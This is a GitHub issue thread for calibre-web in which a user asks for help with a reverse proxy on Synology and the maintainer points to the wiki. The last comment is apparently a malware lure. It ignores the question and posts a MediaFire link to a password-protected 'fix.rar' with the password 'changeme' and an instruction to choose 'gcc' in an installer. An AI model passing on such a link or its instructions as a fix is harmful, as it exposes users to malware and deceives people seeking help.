### ISSUE TITLE
How to set reverse proxy on Synology

### ISSUE THREAD

**Issue by zS1m** [janeczku/calibre-web#3136]
## How to set reverse proxy on Synology

I want to connect calibre-web from external intenet, but after I set reverse proxy for it, I still can not connect it.

Here is my configuration
1. port setting for the docker
![image](https://github.com/user-attachments/assets/71b144dd-c091-4cf0-8c50-eb61018073b7)

2. reverse proxy setting
![image](https://github.com/user-attachments/assets/42177d9f-093a-4e29-a39d-6ec10af0ea9c)

And I can't connect to it through https://mydomain:port

**Comment by OzzieIsaacs** [comment]
I have no idea, please ask for help from the docker provider and/or from some synology support. 
The wiki gives some hints regarding which headers to set: https://github.com/janeczku/calibre-web/wiki/Setup-Reverse-Proxy
And maybe you find some help in the closed issues with keywords synology and proxy: https://github.com/janeczku/calibre-web/issues?q=is%3Aissue+synology+proxy+is%3Aclosed+

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
